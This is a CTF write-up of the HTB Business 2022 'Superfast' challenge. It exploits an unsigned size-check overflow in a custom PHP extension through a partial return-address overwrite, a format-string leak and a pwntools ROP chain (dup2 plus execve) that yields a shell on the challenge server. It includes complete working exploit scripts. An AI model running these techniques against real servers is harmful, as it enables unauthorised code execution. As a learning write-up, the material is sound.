[HTB-Business22] Superfast Writeup | Fascinating Confusion

Wed 20 July 2022
ctf
Galile0
pwn exploit writeup format-string rop php partial overwrite

Superfast was an "easy" exploit challenge during the HTB Business CTF 2022. Although it was rated easy, I found it rather tricky. The challenge was based on a custom shared library loaded into PHP and exposed through a web server.

Challenge setup

We were given a Dockerfile (later fixed to pin the PHP version to a specific commit), the compiled library, its source code, a build environment for the library, and index.php. Let's look at the library source:

zend_string* decrypt(char* buf, size_t size, uint8_t key) {
    char buffer[64] = {0};
    if (sizeof(buffer) - size > 0) {
        memcpy(buffer, buf, size);
    } else {
        return NULL;
    }
    for (int i = 0; i < sizeof(buffer) - 1; i++) {
        buffer[i] ^= key;
    }
    return zend_string_init(buffer, strlen(buffer), 0);
}

PHP_FUNCTION(log_cmd) {
    char* input;
    zend_string* res;
    size_t size;
    long key;
    if (zend_parse_parameters(ZEND_NUM_ARGS(), "sl", &input, &size, &key) == FAILURE) {
        RETURN_NULL();
    }
    res = decrypt(input, size, (uint8_t)key);
    if (!res) {
        print_message("Invalid input provided\n");
    } else {
        FILE* f = fopen("/tmp/log", "a");
        fwrite(ZSTR_VAL(res), ZSTR_LEN(res), 1, f);
        fclose(f);
    }
    RETURN_NULL();
}

__attribute__((force_align_arg_pointer))
void print_message(char* p) {
    php_printf(p);
}

I've shortened the source for readability. Basically, the library adds a new log_cmd function which takes some input, XORs it with a user-defined value, and writes it to /tmp/log. Let's see how it is called from index.php:

<?php
//echo $_SERVER['HTTP_CMD_KEY'];
if (isset($_SERVER['HTTP_CMD_KEY']) && isset($_GET['cmd'])) {
    $key = intval($_SERVER['HTTP_CMD_KEY']);
    //echo $key;
    if ($key <= 0 || $key > 255) {
        http_response_code(400);
    } else {
        log_cmd($_GET['cmd'], $key);
    }
} else {
    http_response_code(400);
}

Pretty straightforward. We supply cmd as a GET parameter and the key as a request header.

A subtle bug

The issue here is subtle and hard to spot in the source code. Of course we know memcpy is dangerous, so naturally we try sending a large string, and we get a segfault. But wait, shouldn't if (sizeof(buffer) - size > 0) { ensure that our input isn't larger than the 64-byte buffer? That was clearly the intent, but the check is broken because size_t is an unsigned type. The compiler sees a subtraction of two unsigned values, which can never be negative: if size is larger than 64, the result wraps around to a huge positive number. So the only way this subtraction does not yield a value larger than 0 is if size is exactly 64. This can also be verified in the disassembly.

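The check would have worked if the result had been converted to a signed type before the comparison. The following code shows the difference between the signed result and the unsigned comparison: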

#include <stdio.h>

int main()
{
    size_t target_size = 10;
    size_t input_size = 100;
    int result = target_size - input_size;
    printf("%d\n", result);
    if((target_size - input_size) > 0) {
        printf("Input < Target");
    } else {
        printf("Input > Target");
    }
}

Running this results in:

-90
Input < Target
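To see which sizes actually get past the check, the unsigned arithmetic can be modelled in a few lines of Python. This is only a sketch: it assumes a 64-bit target (so size_t is 64 bits wide), and the helper names unsigned_sub and check_passes are made up for illustration.

```python
SIZE_T_BITS = 64   # assumption: 64-bit target, so size_t has 64 bits
BUFFER_SIZE = 64   # sizeof(buffer) in decrypt()

def unsigned_sub(a: int, b: int) -> int:
    """Subtract the way C does for size_t: the result wraps modulo 2**64."""
    return (a - b) % (1 << SIZE_T_BITS)

def check_passes(size: int) -> bool:
    """Model of `sizeof(buffer) - size > 0` with unsigned operands."""
    return unsigned_sub(BUFFER_SIZE, size) > 0

# Print, for a few input sizes, whether memcpy would be reached.
for size in (10, 63, 64, 65, 200):
    print(size, check_passes(size), hex(unsigned_sub(BUFFER_SIZE, size)))
```

Only a size of exactly 64 is rejected; every larger size wraps around to a huge positive value and reaches memcpy.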

Alright, so we can overflow the buffer. Now what?

Setting up the exploit

First, let's get some basic scripting going to interact with the binary.

#!/usr/bin/env python3
from pwn import *
from urllib.parse import quote_plus
import time

# Exploit configs
php = ELF('./php', checksec=False)
host = '127.0.0.1'
port = 1337
context.binary = php.path

def launch_gdb(breakpoints=[], cmds=[]):
    if args.NOPTRACE or args.REMOTE:
        return
    info("Attaching Debugger")
    cmds.append('handle SIGALRM ignore')
    for b in breakpoints:
        cmds.insert(0,'b *' + str(SO_ADR+b))
    gdb.attach(php_io, gdbscript='\n'.join(cmds))
    time.sleep(2) # wait for debugger startup

if __name__ == '__main__':
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach

    if not args.REMOTE:
        php_io = process(['./php', '-dextension=./php_logger.so', '-S', '0.0.0.0:1337'])
        php_io.recvuntil(b'started')  # pwntools tubes work on bytes

    def send(key, cmd):
        io = remote(host, port)
        payload = bytes(c ^ key for c in cmd[0:64])  # pre-XOR as raw bytes (also safe for values >= 0x80)
        payload += cmd[64:]
        req = (
            f'GET /?cmd={quote_plus(payload)} HTTP/1.1\r\n'
            f'Content-Type:application/json\r\n'
            f'CMD_KEY: {str(key)}\r\n\r\n'
            )
        io.send(req.encode())
        return io

    print(send(1, b'AAAABBBB').recvall(timeout=None))

You may wonder why I don't use an HTTP library like requests and instead build the whole HTTP request myself and send it over a raw socket. This will become clear later. Also note that the send method applies the "encryption" to the first 64 bytes up front, so that we don't end up with XORed garbage on the stack.
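The pre-XOR trick can be checked offline with a small model of the server-side loop. This is a sketch under assumptions: server_xor only mirrors the for loop in decrypt() (not the memcpy or strlen), and both function names are hypothetical. One detail from the C source is worth noting: the loop runs while i < sizeof(buffer) - 1, so it only touches indices 0 to 62. The sketch therefore pre-XORs 63 bytes; the send helper above pre-XORs 64, which means the byte at index 63 arrives XORed once (with key 1, an 'A' there shows up as '@').

```python
XORED_LEN = 63  # the C loop runs for i in 0..62 (i < sizeof(buffer) - 1)

def server_xor(buf: bytes, key: int) -> bytes:
    """Model of the XOR loop in decrypt(): only the first 63 bytes change."""
    head = bytes(b ^ key for b in buf[:XORED_LEN])
    return head + buf[XORED_LEN:]

def pre_xor(cmd: bytes, key: int) -> bytes:
    """Client-side counterpart: XOR is its own inverse, so reuse the model."""
    return server_xor(cmd, key)

key = 1
wanted = b"%p " * 25 + b"A" * 10
# After the server applies its XOR, the buffer holds exactly what we wanted.
assert server_xor(pre_xor(wanted, key), key) == wanted
```

Everything past the XORed prefix, including the bytes that land on the saved return address, is sent as-is.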

Back to exploitation. While we can overwrite the return address of the decrypt function and even way beyond that, we don't know any address to overwrite it with. This is where partial overwrites come into play: even without knowing any addresses, we can still overwrite the lowest few bytes of the return address. This allows us to at least redirect the execution flow within the module that decrypt returns into. Since we want to get a leak, the printf function seems like a good target. Jumping directly to the printf entry linked in the GOT crashes the binary, but we can jump to the call inside the zif_log_cmd function at 0x1440. Let's check in GDB what our return address overwrite looks like. To do so we add the following to our exploit script:

launch_gdb(cmds=['b decrypt+523', 'c'])
send(1, b'A'*0x98 + b'BBBB')

Launching this gives the following result in GDB:

$rax   : 0x007f5cd245f240  →  0x0000001600000001
$rbx   : 0x005626d4a20b80  →  0x0000000000000000
$rcx   : 0x4000
$rdx   : 0x007f5cd245f240  →  0x0000001600000001
$rsp   : 0x007ffcf914f0d8  →  0x00007f5c42424242
$rbp   : 0x2
$rsi   : 0x007ffcf914f048  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$rdi   : 0x007f5cd245f260  →  "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]"
$rip   : 0x007f5cd5e033bc  →  <decrypt+523> ret
$r8    : 0x007f5cd245f2d5  →  0xfcf914f040000000
$r9    : 0x007f5cd539e517  →  <__memcpy_ssse3+3895> movaps xmm2, XMMWORD PTR [rsi-0x18]
$r10   : 0x007f5cd5e025d5  →  "_emalloc"
$r11   : 0x007f5cd5402060  →  0xfff9d1d0fff9d008
$r12   : 0x007f5cd2414170  →  0x0000000000000000
$r13   : 0x0
$r14   : 0x007f5cd2414020  →  0x007f5cd248b820  →  0x005626d3b90068  →  <execute_ex+8120> mov r12, QWORD PTR [r14+0x8]
$r15   : 0x007f5cd248b820  →  0x005626d3b90068  →  <execute_ex+8120> mov r12, QWORD PTR [r14+0x8]
──────────────────────────────────────────────────────────────────────────────────── stack ────
0x007ffcf914f0d8│+0x0000: 0x00007f5c42424242         ← $rsp
0x007ffcf914f0e0│+0x0008: 0x007ffcf914f160  →  0x0000000000000000
0x007ffcf914f0e8│+0x0010: 0x007f5cd2414170  →  0x0000000000000000
0x007ffcf914f0f0│+0x0018: 0x005626d4a20b80  →  0x0000000000000000
0x007ffcf914f0f8│+0x0020: 0x0000000000000001
0x007ffcf914f100│+0x0028: 0x000000000000009c
0x007ffcf914f108│+0x0030: 0x007f5cd245f0d8  →  "@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@[...]"
0x007ffcf914f110│+0x0038: 0x0000000000000002
────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x7f5cd5e033af <decrypt+510>    mov    rax, QWORD PTR [rsp+0x60]
0x7f5cd5e033b4 <decrypt+515>    nop
0x7f5cd5e033b5 <decrypt+516>    add    rsp, 0xb8
→ 0x7f5cd5e033bc <decrypt+523>    ret

This is super nice since we see our ret is overwritten with 4 B's and rdi still points to our input. This means we should get an easy format string!
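The effect of a partial overwrite on a little-endian return address can be reproduced with struct. This is a minimal sketch: the saved_ret value is a hypothetical return address chosen to sit in the same region as the GDB dump, and partial_overwrite is an illustrative helper, not part of the exploit script.

```python
import struct

def partial_overwrite(saved_ret: int, new_low_bytes: bytes) -> int:
    """Replace the lowest bytes of a 64-bit little-endian address."""
    raw = bytearray(struct.pack("<Q", saved_ret))
    raw[:len(new_low_bytes)] = new_low_bytes  # overflow writes low bytes first
    return struct.unpack("<Q", bytes(raw))[0]

saved_ret = 0x7F5CD5E03465  # hypothetical saved return address in php_logger.so

# Four bytes of 'B' leave the upper bytes intact, as seen at $rsp in the dump.
print(hex(partial_overwrite(saved_ret, b"BBBB")))
# A single byte moves the return target within the same 256-byte window.
print(hex(partial_overwrite(saved_ret, b"\x40")))
```

Because ASLR randomizes at page granularity, the lowest byte of a target address is fixed, so a one-byte overwrite needs no leak and no brute force.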

Getting some leaks

So let's try our format string and use the following payload:

p = b'%p ' * 25
p += b'A' * (0x98 - len(p))
p += b'\x40'
print(send(1, p).recvall(timeout=None))

As you can see it's enough to overwrite the very last byte of the return address as the return already goes into the right address space. Doing so, we get the following leaks:

0x7fffe92a0688 0x7f0c87c5a300 0x4000 0x7f0c87c5a395 0x7f0c8ab06517 0x564967220b80 0x7f0c87c5a320 0x2 0x7f0c8b56b445 0x7fffe92a07a0 0x7f0c87c14170 0x564967220b80 0x1 0x99 0x7f0c87c5a0d8 0x2 0x11ca5664fbeed00 0x2

Mapping this to the memory map of our process, we can see an address inside php_logger.so, an address inside php itself, and a stack address. Unluckily for us, there is no libc leak.

At this point I was stuck for quite a while, as I tried to use the usual %10$p positional format specifier to read/write other values. But for some reason PHP's (or Zend's) printf implementation doesn't support it, so we are stuck with whatever values we can reach naturally. We can, however, calculate the base addresses of both the library and php itself. This means we probably need to do a classic ropchain. The gadgets in the logger library are of no real use, so let's try to get a ropchain in php going. First, let's parse the leaks:

p = b'%p ' * 25
p += b'A' * (0x98 - len(p)) # padding
p += b'\x40'

leaks = send(1, p).recvall(timeout=None).split()
php.address = int(leaks[22], 16) -  0x1420b80
success(f"PHP @ {php.address:012x}")

Neat! Now we have to think about what kind of ropchain we can even build and use.
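The base calculation can be double-checked by hand against the leak shown earlier. Since recvall() returns the complete HTTP response, split() presumably also yields header tokens, which would explain the index 22 in the script. The sketch below avoids a fixed index: it assumes the offset 0x1420b80 from the script (valid only for this particular php build) and picks the token whose implied base is page-aligned. The function name php_base_from_leaks is hypothetical.

```python
PHP_LEAK_OFFSET = 0x1420B80  # offset of the leaked pointer, taken from the script above

def php_base_from_leaks(response: bytes, offset: int = PHP_LEAK_OFFSET) -> int:
    """Return the first page-aligned base implied by any 0x... token."""
    for token in response.split():
        if not token.startswith(b"0x"):
            continue  # skip HTTP header tokens and other non-pointer text
        value = int(token, 16)
        base = value - offset
        if base > 0 and base & 0xFFF == 0:
            return base
    raise ValueError("no token matches the expected offset")

sample = (b"0x7fffe92a0688 0x7f0c87c5a300 0x4000 0x7f0c87c5a395 0x7f0c8ab06517 "
          b"0x564967220b80 0x7f0c87c5a320 0x2 0x7f0c8b56b445 0x7fffe92a07a0 "
          b"0x7f0c87c14170 0x564967220b80 0x1 0x99 0x7f0c87c5a0d8 0x2 "
          b"0x11ca5664fbeed00 0x2")
print(hex(php_base_from_leaks(sample)))
```

A page-aligned result is a cheap sanity check that the right pointer was picked before any gadget address is derived from it.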

Exploitation fails

At this point I was stuck again for what felt like forever. Because how do we exploit this? We could call execve("/bin/sh") as one does in these cases. But of course we have no access to stdin or stdout, so the server would just hang and that's it. What I tried was writing a PHP shell to the web directory, leveraging the fopen and fgets already linked in php_logger.so. While it worked locally, it didn't on the remote. As I found out after the CTF, the user had no write permission in the web folder. [Insert sad hacker noises].

And that's where I was stuck, and also why we didn't solve this challenge until after the CTF. After some sleep and talking to friends and colleagues, the solution was quite obvious: we can call dup2 to redirect stdin, stdout and stderr to the file descriptor of the socket that PHP has open to send the response. After that we can indeed just call execve("/bin/sh") and interact with the shell as usual. That's also the reason why I didn't use requests or urllib from the start: they don't let us interact with the raw socket and would just hang waiting for a server response.
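The dup2 idea can be tried out locally without any exploit. The following sketch assumes a Linux-like system with /bin/sh; it uses a socketpair in place of the HTTP connection and a forked child in place of the hijacked PHP process. The function name shell_over_socket is made up for this illustration.

```python
import os
import socket

def shell_over_socket(command: bytes) -> bytes:
    """Run a command in a shell whose stdin/stdout/stderr are a socket."""
    parent, child = socket.socketpair()
    pid = os.fork()
    if pid == 0:
        # Child: plays the role of the process after the ROP chain ran.
        try:
            parent.close()
            for std_fd in (0, 1, 2):
                os.dup2(child.fileno(), std_fd)  # point stdio at the socket
            os.execv("/bin/sh", ["/bin/sh"])
        finally:
            os._exit(127)  # only reached if execv failed
    # Parent: plays the role of the attacker on the other end.
    child.close()
    parent.sendall(command + b"\nexit\n")
    output = b""
    while True:
        chunk = parent.recv(4096)
        if not chunk:
            break  # shell exited and closed its end
        output += chunk
    os.waitpid(pid, 0)
    parent.close()
    return output

print(shell_over_socket(b"echo hello from the shell"))
```

In the real exploit the socket descriptor number has to be known or guessed; here the child simply uses the descriptor it inherited.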

PHP Ropchain

Now that we know what we have to do, it's actually quite easy. I built my ropchain manually using ropper and copying addresses around. But after the CTF someone on Discord showed me that pwntools offers a super nice (and surprisingly well-working) wrapper for that. And since my writeups are supposed to teach new stuff, why not use that? So I rewrote my ropchain using this fancy pwntools module:

r = ROP(php)
r.call('dup2', [4, 0])
r.call('dup2', [4, 1])
r.call('dup2', [4, 2])
binsh = next(php.search(b"/bin/bash\x00"))
r.execve(binsh, 0, 0)

p = b'A'*0x98 # padding
p += r.chain()
send(1, p).interactive()

For this to work you have to load the correct binary as an ELF object (in this case I did so at the start of the script). And that's it. Now we can start our remote instance, copy the IP and port into the config at the top of the script and call ./exploit.py REMOTE (in this case running against the local Docker instance provided by the challenge):

❯ ./writeup.py REMOTE
[*] '/media/sf_vmexchange/ctfyo/pwn_superfast/challenge/php'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    Packer:   Packed with UPX
[+] Opening connection to 127.0.0.1 on port 1337: Done
[+] Receiving all data: Done (354B)
[*] Closed connection to 127.0.0.1 port 1337
[+] PHP @ 55b935400000
[*] Loaded 322 cached gadgets for './php'
[*] Using sigreturn for 'SYS_execve'
[+] Opening connection to 127.0.0.1 on port 1337: Done
[*] Switching to interactive mode
$ id
uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls
core
flag.txt
index.php
php_logger.so
start.sh
$ cat flag.txt
HTB{rophp1ng_4r0und_th3_st4ck!}
$ 👍
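For readers curious what a hand-built chain for the three dup2 calls looks like on the stack, here is a rough sketch using only struct. All gadget and function offsets are hypothetical placeholders (a real chain needs the offsets found with a gadget finder for the exact php build), it assumes clean pop rdi; ret and pop rsi; ret gadgets exist, and it ignores stack alignment and the final execve.

```python
import struct

def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value, as it would sit on the stack."""
    return struct.pack("<Q", value)

def call2(pop_rdi: int, pop_rsi: int, func: int, arg1: int, arg2: int) -> bytes:
    """Stack layout for func(arg1, arg2) under the System V AMD64 ABI."""
    return p64(pop_rdi) + p64(arg1) + p64(pop_rsi) + p64(arg2) + p64(func)

base = 0x55B935400000     # PHP base as printed in the run above
POP_RDI = base + 0x1111   # hypothetical offset of a `pop rdi; ret` gadget
POP_RSI = base + 0x2222   # hypothetical offset of a `pop rsi; ret` gadget
DUP2 = base + 0x3333      # hypothetical offset of dup2's PLT entry

# dup2(4, 0); dup2(4, 1); dup2(4, 2)
chain = b"".join(call2(POP_RDI, POP_RSI, DUP2, 4, fd) for fd in (0, 1, 2))
print(len(chain), chain[:16].hex())
```

Each call costs five stack slots here, which is the bookkeeping the pwntools ROP helper takes care of automatically.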

Too bad we didn't solve this one during the CTF, but to be fair: Even in hindsight I wouldn't have rated this one as easy. But well, you never stop learning!

Complete pwnscript

#!/usr/bin/env python3
from pwn import *
from urllib.parse import quote_plus
import time

# Exploit configs
php = ELF('./php', checksec=False)
host = '127.0.0.1'
port = 1337
context.binary = php.path # Important for ROP() to work

def launch_gdb(breakpoints=[], cmds=[]):
    if args.NOPTRACE or args.REMOTE:
        return
    info("Attaching Debugger")
    cmds.append('handle SIGALRM ignore')
    for b in breakpoints:
        cmds.insert(0,'b *' + str(SO_ADR+b))
    gdb.attach(php_io, gdbscript='\n'.join(cmds))
    time.sleep(2) # wait for debugger startup

if __name__ == '__main__':
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach
    # call with REMOTE to skip local process creation and disable launch_gdb()

    if not args.REMOTE:
        php_io = process(['./php', '-dextension=./php_logger.so', '-S', '0.0.0.0:1337'])
        php_io.recvuntil(b'started') # Wait for local server to spawn

    def send(key, cmd):
        io = remote(host, port)
        payload = bytes(c ^ key for c in cmd[0:64])  # pre-XOR as raw bytes (also safe for values >= 0x80)
        payload += cmd[64:]
        req = (
            f'GET /?cmd={quote_plus(payload)} HTTP/1.1\r\n'
            f'Content-Type:application/json\r\n'
            f'CMD_KEY: {str(key)}\r\n\r\n'
            )
        io.send(req.encode())
        return io

    p = b'%p ' * 25
    p += b'A' * (0x98 - len(p)) # padding
    p += b'\x40'

    leaks = send(1, p).recvall(timeout=None).split()
    php.address = int(leaks[22], 16) -  0x1420b80
    success(f"PHP @ {php.address:012x}")

    r = ROP(php)
    r.call('dup2', [4, 0])
    r.call('dup2', [4, 1])
    r.call('dup2', [4, 2])
    binsh = next(php.search(b"/bin/bash\x00"))
    r.execve(binsh, 0, 0)

    p = b'A'*0x98 # padding
    p += r.chain()
    send(1, p).interactive()